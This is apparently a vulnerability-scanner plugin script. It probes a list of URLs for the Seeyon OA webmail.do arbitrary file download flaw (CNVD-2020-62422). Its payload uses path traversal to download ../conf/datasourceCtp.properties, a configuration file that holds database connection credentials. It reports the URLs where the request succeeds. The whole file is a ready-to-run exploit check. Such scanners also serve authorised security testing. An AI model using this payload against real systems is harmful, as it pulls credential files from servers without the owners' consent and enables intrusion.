#request urls = array
#define payload = /seeyon/webmail.do?method=doDownloadAtt&filename=Wker.txt&filePath=../conf/datasourceCtp.properties
#define bug = workflow
#define info = 致远OA webmail.do任意文件下载 CNVD-2020-62422

function main(args){
	printclolor("当前正在检测:".info,1);
	i = 0;
	num = GetArrayNum(urls);
	while(i<num){
		url = urls[i];
		try{
			res = HttpGet(url.payload,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
			if(StrFindStr(res[0],bug,0)!= "-1")
			{
				printclolor("[+]".urls[i].info,3);
			}
		}catch{
		}
		i = ToInt(i+1);
	}
	
}
